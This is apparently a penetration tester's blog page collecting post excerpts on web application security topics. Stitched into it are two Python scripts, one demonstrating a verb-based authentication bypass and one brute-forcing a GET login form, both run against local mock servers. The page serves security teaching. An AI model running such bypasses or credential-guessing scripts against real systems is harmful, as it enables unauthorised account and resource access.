Protected: Real World Penetration Testing: A gh0st from Offensive Security



Breaking the Application with Shritam Bhowmick – Application Bruteforce Demystified.

Web Form Brute Force Methods

Demonstration by Shritam Bhowmick
Web Application Penetration Tester
Independent Consulting Security Evangelist

Abstract

These are web application penetration testing challenges hosted at pentesteracademylab.appspot.com; the site offers several challenges that web application security researchers can break in a safe environment. This is for lab practice only, and no part of this document was provided by the original authors. Having pulled out my old research on application security, I thought I would give some of it back to the community, although not all of it is meant to be released here. This research is part of my private application security research and is offered as an opening for others to dig in and work further on it, as long as the original authors are credited.

Contents

Hack.
Method 1: Using Hydra to Brute Force Web Logins
Method 2: Using Burp Suite Intruder to Brute Force Web Logins

Method 3: Using Python to break Web-Form Login
Method 4: Using WebSlayer to Brute Force Web Logins
Method 5: Nmap Script Code to break web form
Contact Information.


Shritam Bhowmick Explains Shell Injection v/s Remote Code Execution v/s Code Injection – Yes, they are Different!

Shell Injection v/s Remote Code Execution v/s Code Injection

By Shritam Bhowmick
Web Application Penetration Tester
LinkedIn: https://www.linkedin.com/profile/view?id=281014248&trk=nav_responsive_tab_profile
Academia: https://independent.academia.edu/ShritamBhowmick
Facebook: https://www.facebook.com/coded32

The Bare Beginning

I promised to deliver yet another piece of quality content on my blog and, as promised, after this particular post my intention was to go ahead with posting something deep on HTTP Parameter Pollution. Looking at the awareness level (read the comments for a deep insight into application security!) of incoming self-proclaimed security researchers or bug hunters, I recently decided to make my point and let the info-sec community know the real concepts behind application injection vulnerabilities. This post is meant to switch off the ego gap and provide a platform for others to realize core concepts and why such concepts need to apply to adaptive application penetration testing!

I quickly realized the core necessity of distinguishing vulnerability levels according to their categorization and of being really technical about the application security issue; this post focuses primarily on injection-level web vulnerabilities, which are very common if one digs deep enough. In recent conversations with many 'elite' bug hunters, I noticed a huge gap in the technical consciousness they possess; they likely end up only getting T-shirts for the sake of a name on a Hall of Fame (no pun intended!). Money will encircle you, girls will encircle you, knowledge will encircle you, cars, super-bikes and the like!


Shritam Bhowmick Explains HTTP Parameter Contamination

HTTP Parameter Contamination

By Shritam Bhowmick
Web Application Penetration Tester
LinkedIn: https://www.linkedin.com/profile/view?id=281014248&trk=nav_responsive_tab_profile
Academia: https://independent.academia.edu/ShritamBhowmick
Facebook: https://www.facebook.com/coded32

Earlier, in my previous post on Enterprise HTTP Security, I described how HTTP security is fine clockwork for an application penetration tester; this post looks into deeper aspects of HTTP security and how logical manipulation of HTTP could be used by an attacker to surface the underlying application-level vulnerabilities, bypassing any security restrictions that were originally in place.

During the standard phases of application development, multi-tier application architecture is prevalent. Multi-tier architecture is a client-server architecture in which presentation, application processing and data management are separate processes. In basic terms, multi-tier architectures are convenient for developers: they can reuse code and develop applications without having to write the whole application framework all over again, modifying only parts of the architecture tier by tier and profiting from the flexibility this gives. The unfortunate part is that handling the same data across multiple platforms can lead to a security breach or leave the application vulnerable. Logical errors are triggered this way and are completely different from injection-based attacks such as:

  • LDAP/Blind LDAP Injections
  • XML Injection
  • HTML Injection
  • SQL Injection
  • ORM based Injection
  • Spring Injection/nHibernate Injection
  • Xpath Injection
  • Command Injection

All of the above 'injection' variants are code-level application vulnerabilities and are completely different from 'logical' vulnerabilities, which can have an even greater impact on web applications. During my early research dissecting the behavioural patterns of applications on different platforms and web architectures, I found that these led to a couple of logic-based vulnerabilities which an attacker could use to their benefit. This led me to research further, and I ended up concluding something that already existed, called 'HTTP Parameter Contamination' or HPC. During my research at Defencely, I found that this particular attack methodology does not rely on a specific platform but applies across many different web platforms, such as PHP on Apache, ASP.NET on IIS, etc.


Enterprise HTTP Security Inspection for Realistic Application Security

The need for HTTP Security Inspection on Application Security

By Shritam Bhowmick
Web Application Penetration Tester
LinkedIn: https://www.linkedin.com/profile/view?id=281014248&trk=nav_responsive_tab_profile
Academia: https://independent.academia.edu/ShritamBhowmick
Facebook: https://www.facebook.com/coded32

Application Layer – HTTP from the Security Perspective

The application layer is the first layer that needs a security check going beyond the other common checks. Automated scanners might do some of this as pre-defined in their programmed logic, but most of them fail to find the bugs that pass through the HTTP handler, and so critical vulnerabilities remain for the business enterprise. Yes, I am talking about the Hypertext Transfer Protocol, which is by now the most common and most widely used text-based protocol on the internet. Web applications use this text-based protocol since it is easy to implement and handles parallel requests. The web server handles the requests made by clients, and penetration testers often ignore a variety of checks against HTTP from the security perspective. Once an application penetration tester has grown fairly used to studying HTTP at a deep level, he or she can understand why a particular request could be manipulated with a client-side proxy in multiple ways to produce a critical security bypass.

Before concluding on the security aspects of the Hypertext Transfer Protocol, my application security research has produced a comprehensive study of where to start with HTTP from the security standpoint. This question has been asked many times, and people have failed to come up with an exact method to detail everything in one book or post. This study is more of a guideline for application penetration testers than a reference study, but it could be used either way. I had prepared a standard draft for HTTP security research in topic segments which could be sub-categorized if wished, but for the sake of reference and guidance I have detailed them as modular topics which any application security researcher, bug hunter or application security enthusiast could use for their own analysis.



Fine Tuning Adaptive Network Penetration Test – External, Internal and Wireless

Fine Tuning Automation for Network Penetration Test

By Shritam Bhowmick
Web Application Penetration Tester
LinkedIn: https://www.linkedin.com/profile/view?id=281014248&trk=nav_responsive_tab_profile
Academia: https://independent.academia.edu/ShritamBhowmick
Facebook: https://www.facebook.com/coded32

Network Penetration Testing

A lot has been discussed about network penetration testing in forums, on IRC and at security conferences, but everyone looked for an automated approach to keep network penetration test tasks moving fast. The fast approach is desired for mass IP scans and large IP ranges which have to be tested in a short time. Most of these network nodes have services open which could be investigated further if those services are known to be exploited in the wild.


There are various kinds of network penetration testing, referenced below:

  1. External Network Penetration Testing
  2. Internal Network Penetration Testing
  3. Wireless Network Penetration Testing

Now, as most of you have already assumed, there could be an automated approach to all of them; this seems easy but is harder when taken from a wide security viewpoint. The art of choosing the set of tools at your disposal for a network security audit lies beyond the defined scope, since many of these tools send malicious packets which could stress a web server or a critical production server, costing the client financially through loss of service. As a penetration tester I have learned this art from my own lessons and experiences, and this would be my own personal methodology for a network penetration test. Some of the questions which should be asked of the client beforehand, before beginning an engagement, provide the major feedback on how one should prepare for the penetration test.


Adaptive Application Framework Driven Vulnerabilities and the Padding Oracle

Securing Web Applications before Deployment.

An analysis focused on the various frameworks used to deploy web applications.

By Shritam Bhowmick
Web Application Penetration Tester
LinkedIn: https://www.linkedin.com/profile/view?id=281014248&trk=nav_responsive_tab_profile
Academia: https://independent.academia.edu/ShritamBhowmick
Facebook: https://www.facebook.com/coded32

Abstract

Dedicated vulnerability and bug researchers go deep into application security aspects while studying application internals, and there is a prominent rise in hidden attack vectors which are never common. There is a common misconception among developers that deploying applications built on vendor-supplied, third-party proprietary framework libraries adds security to the application. The libraries the developers rely on are themselves vulnerable if properly dissected and studied. This brings business concerns to the business assets. The business assets could be anything from bank details to stored credit card information kept so that customers can easily access such numbers. Although data integrity is maintained and the data is encrypted when stored, it takes an attacker only a while to get in and get out without really being noticed. Contrary to the statements above, there is yet another belief that open-source libraries will be safer since they are revised by the mass community, but the truth is bitter. Deep down in the open-source libraries there exist multiple critical vulnerabilities which need to be addressed before deploying them as they are. The information below details the vulnerabilities deep inside the libraries used to deploy rich internet applications.


What do developers see as a convenient way to deploy a web application?

  • Languages used: PHP, Java, Ruby, Scala, Perl, Python, Haskell, ColdFusion and more.
  • Frameworks used: .NET, Zend, CodeIgniter, Spring, Catalyst, Snap, CakePHP, Yii, Fusebox and more. Even more popular ones are Django, Sinatra, Mason, Pyjamas, Symfony and Grails.


Web Security Threat Prediction

By Shritam Bhowmick
Web Application Penetration Tester
LinkedIn: https://www.linkedin.com/profile/view?id=281014248&trk=nav_responsive_tab_profile
Academia: https://independent.academia.edu/ShritamBhowmick
Facebook: https://www.facebook.com/coded32

Abstract

The web security scene is more complex than ever, and it is time various industries take a deeper look at it to gain an in-depth grasp of the situation which affects them directly or indirectly. It could come as a blow and not let you know until it's too late. This post presents recent predictions in terms of web security and informs you about the latest web attacks on the rise and how such attacks are bad for business and reputation, let alone the financial losses. When we talk about industry, this doesn't have to be the retail industry; it stretches from medical appliances to car manufacturing and down to the electronic cigarette industry. That being said, we will look at how various industrial assets which have had, and continue to have, a presence on the web are affected directly or indirectly, and why web security is an absolutely important factor for them, too big a risk to ignore or compromise on.

Prediction 2015

I have come across and carried out a statistical background check on as many application attack vectors as possible, and from the statistical approach have arrived at a very conclusive set of industries which could go bankrupt as well as suffer reputation loss if the web security part is ignored. Here are some of the industries which face a direct impact on business by ignoring web security at their end.

  • Medical Department
  • Web Retail Department and Business Assets
  • Opensource Platforms
  • Mobile Devices



VBAAC Bypass – Verb Based Authentication and Access Control.

This post is dedicated to the VBAAC bypass detailed in the ongoing research documentation I have been doing. This part of the series belongs to 'Web Application Exploitation' and has been pinned to this post for my personal reference. Work has just exploded and, for the need to trace back everything that is being done, everything about the paper goes here. The contents of this post are entirely devoted to personal research. The blog itself is personal.

What is covered in VBAAC Bypass:

  • Concept of server-side controls.
  • HTTP RFCs for 'verbs'.
  • WebDAV 'verbs' or 'methods'.
  • Access control mechanisms via Apache.
  • Configuring Apache to make use of access control mechanism configurations.
  • Using the .htaccess file for access control.
  • Example JSP web server web.xml configuration.
  • Example protected-resource .htaccess configuration for Apache servers.
  • Snippet of application code for VBAAC bypass.
  • Authentication v/s Authorization for Apache web servers.
  • Techniques to bypass 'methods' or 'verbs'.
  • Bypass via HEAD.
  • Bypass via an arbitrary 'verb'.
  • Application server-side configuration based 'verb' bypass.
  • Defeating authentication, and hence authorization, via verb-based bypass techniques.

The entire documentation revolves around creating a web application first, prior to bypassing authentication on it. Because URL-based authentication protects resources with 'Basic' or 'Digest' authentication, a very brief introduction to the standardized HTTP 'verbs' is provided. This is required throughout the document. A good number of WebDAV verbs are also provided with the RFCs attached. Samples of the work are attached below and are for private purposes only. The document isn't public.
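The HEAD and arbitrary-verb bypasses listed above, played out against a small mock server, as an added example that is not part of the original paper. The handler models an access control rule that applies only to an explicit verb list (a web.xml security-constraint naming http-method GET and POST, or an Apache <Limit> block): Basic credentials are demanded only for the listed verbs, so a HEAD request or a made-up verb reaches the protected resource, while the hardened variant checks every verb. The credentials, the /admin path and the verb name JEFF are assumptions constructed for the demo.

```python
"""Verb-based access control (VBAAC) bypass against a local mock server.

Added example, not from the original paper. Models a rule that checks
credentials only for the verbs it lists, then probes it with HEAD and an
arbitrary verb.
"""
import base64
import threading
import urllib.error
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed credentials and protected path for the demo (assumptions).
USER, PASSWORD = "admin", "s3cret"
PROTECTED_PREFIX = "/admin"
EXPECTED_AUTH = "Basic " + base64.b64encode(f"{USER}:{PASSWORD}".encode()).decode()

# Own opener so environment proxy settings cannot divert the loopback traffic.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


def build_handler(limit_only_get_post):
    """limit_only_get_post=True mimics a verb-listed rule such as
    <Limit GET POST> (vulnerable); False requires credentials for every
    verb (hardened)."""

    class Handler(BaseHTTPRequestHandler):
        def _needs_auth(self):
            if not self.path.startswith(PROTECTED_PREFIX):
                return False
            if limit_only_get_post:
                return self.command in ("GET", "POST")  # other verbs unchecked
            return True

        def _serve(self):
            if self._needs_auth() and self.headers.get("Authorization") != EXPECTED_AUTH:
                self.send_response(401)
                self.send_header("WWW-Authenticate", 'Basic realm="admin"')
                self.send_header("Content-Length", "0")
                self.end_headers()
                return
            body = b"<h1>admin panel</h1>"
            self.send_response(200)
            self.send_header("Content-Type", "text/html")
            self.send_header("Content-Length", str(len(body)))
            self.end_headers()
            if self.command != "HEAD":  # HEAD gets the headers only
                self.wfile.write(body)

        do_GET = do_POST = do_HEAD = _serve

        def __getattr__(self, name):
            # Route any unknown verb (do_JEFF, ...) to the same resource
            # handler, like a backend that falls through to its default path.
            if name.startswith("do_"):
                return self._serve
            raise AttributeError(name)

        def log_message(self, *args):  # keep the demo quiet
            pass

    return Handler


def probe(base_url, method, authorization=None):
    """Send one request with the given verb and return the HTTP status code."""
    req = urllib.request.Request(base_url + PROTECTED_PREFIX + "/", method=method)
    if authorization:
        req.add_header("Authorization", authorization)
    try:
        with OPENER.open(req, timeout=5) as resp:
            return resp.status
    except urllib.error.HTTPError as err:
        return err.code


def run_demo(limit_only_get_post):
    """Probe the protected path with GET, HEAD and an arbitrary verb, no credentials."""
    srv = HTTPServer(("127.0.0.1", 0), build_handler(limit_only_get_post))
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    try:
        base = "http://127.0.0.1:%d" % srv.server_address[1]
        return {verb: probe(base, verb) for verb in ("GET", "HEAD", "JEFF")}
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print("verb-listed rule:", run_demo(True))    # GET 401, HEAD 200, JEFF 200
    print("all verbs checked:", run_demo(False))  # all 401
```

Which verb gets through on a real stack depends on the server: Apache folds HEAD into GET inside <Limit>, so there the arbitrary verb is the one to try, while servlet containers answer HEAD by running doGet, and how an unknown verb is handled varies by backend. The fix is the same in every case: make the rule verb-agnostic, with no <Limit> block (or <LimitExcept> around an allow list) in Apache, and no http-method elements inside the web.xml security-constraint.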

 

[Sample pages from the document: Verb 0 to Verb 5]

Had a great day going ahead and improving my drafting skills, and I have been getting a good grip on web application penetration testing from within corporate companies. The point of the research is to bring the real penetration testing scenario back to the general public and make the security-eroded, culturally unaware people out there aware. Have a great weekend ahead!

Web Form Bruteforcing for Web Applications.

Hi,

This is yet another post on how to conduct a web form brute force attack on a web application using the GET method rather than a POST request, since the application supports GET-based requests only. This series of research papers on the exploitation of a targeted web application set up for vulnerability analysis is conducted for 'testing' and 'training' purposes.

What’s different with the research?

I have personally gone over and deduced 'several' ways, and not just 'one' way, to tackle the web application as a target. This first post and the paper itself deliver the 'attack' using different methods rather than sticking to one particular method of exploitation. It's not open to everyone, and these papers are being kept private for reasons. However, this first paper will be public.

What’s not included in the paper?

I have refrained from adding yet 'another' method to the paper for the public domain. This is done to keep the presentation limited to four methods. There are five or more possible methods of conducting the same exploitation on the target.

Sample Images of the paper?

Here are some sample images taken from the papers:

 

[Sample pages from the paper: Sample 1, Sample 2, Sample 3]

What are some of the methods explained?

Some of the methods explained for brute-forcing the web form login of targeted web applications include:

  • Exploitation via crunch-generated username and password files
  • Exploitation using Burp Suite Intruder
  • Exploitation using a Python script for automation
  • Exploitation using WebSlayer by feeding generated dictionaries into the tool

I have refrained from discussing more methods in the paper because the paper itself is supposed to be private for various specific reasons. Those being trained under the 'Web Application Exploitation' course have access to these papers and benefit from them.
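The Python route from the 'Web Form Brute Force Methods' contents earlier on this page and from the list above, as an added example that is not part of the paper: a credential spray against a GET-based login, run against a small mock login server started in-process so that it works offline. The mock application, its accepted credentials, the 'email' and 'password' parameter names and the failure string 'Invalid credentials' are all constructed for the demo; against a real target you would substitute the lab form's field names and its own failure marker.

```python
"""Web-form brute force over GET, demonstrated against a local mock login.

Added example, not from the original paper. The target below is a toy
server constructed for the demo; only brute_force()/attempt() are the
attack logic.
"""
import itertools
import threading
import urllib.parse
import urllib.request
from http.server import BaseHTTPRequestHandler, HTTPServer

# Constructed credentials the mock target accepts and its failure text (assumptions).
VALID_EMAIL = "admin@example.com"
VALID_PASSWORD = "letmein"
FAIL_MARKER = "Invalid credentials"

# Own opener so environment proxy settings cannot divert the loopback traffic.
OPENER = urllib.request.build_opener(urllib.request.ProxyHandler({}))


class MockLogin(BaseHTTPRequestHandler):
    """Toy GET-based login form standing in for the lab application."""

    def do_GET(self):
        params = urllib.parse.parse_qs(urllib.parse.urlparse(self.path).query)
        email = params.get("email", [""])[0]
        password = params.get("password", [""])[0]
        if email == VALID_EMAIL and password == VALID_PASSWORD:
            body = b"<h1>Welcome back</h1>"
        else:
            body = FAIL_MARKER.encode()
        self.send_response(200)  # same status either way, as many real forms do
        self.send_header("Content-Type", "text/html")
        self.send_header("Content-Length", str(len(body)))
        self.end_headers()
        self.wfile.write(body)

    def log_message(self, *args):  # keep the demo quiet
        pass


def start_server():
    """Bind the mock login to a free loopback port and serve it in a thread."""
    srv = HTTPServer(("127.0.0.1", 0), MockLogin)
    threading.Thread(target=srv.serve_forever, daemon=True).start()
    return srv


def attempt(base_url, email, password, timeout=5):
    """One login attempt over GET; success = failure marker absent from the body."""
    query = urllib.parse.urlencode({"email": email, "password": password})
    with OPENER.open(base_url + "?" + query, timeout=timeout) as resp:
        body = resp.read().decode(errors="replace")
    return FAIL_MARKER not in body


def brute_force(base_url, users, passwords):
    """Try every user/password pair in order; return the first valid pair or None."""
    for email, password in itertools.product(users, passwords):
        if attempt(base_url, email, password):
            return email, password
    return None


def run_demo(passwords=None):
    """Spin up the mock target, run the spray against it, and tear it down."""
    users = ["test@example.com", "admin@example.com"]
    if passwords is None:
        passwords = ["password", "123456", "letmein", "qwerty"]
    srv = start_server()
    try:
        base = "http://127.0.0.1:%d/login" % srv.server_address[1]
        return brute_force(base, users, passwords)
    finally:
        srv.shutdown()
        srv.server_close()


if __name__ == "__main__":
    print(run_demo())  # ('admin@example.com', 'letmein')
```

Success here means the failure marker is missing from the body, which is the same check the Burp Suite Intruder and WebSlayer methods make by grepping the response or comparing its length; combine it with the status code and any Location header to avoid false positives when the application answers with a generic error page. Account lockout and rate limiting on the target will cut a run like this short, and on anything but a lab target the candidate lists must stay within what the engagement scope allows.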

Where can this paper be downloaded from?

Currently this paper can be downloaded from my personal Dropbox; any later changes will not be reflected here, and the original paper is updated much sooner than expected. Download link: https://www.dropbox.com/s/6uebzfzm10db14h/1.%20Web-Form%20Brute%20Force%20Methods.pdf?m=

I am considering uploading these public papers in various places, so that if one site goes down, they can still be downloaded from another. This is part of the series of papers to come. Some of them will definitely be public. Others won't be.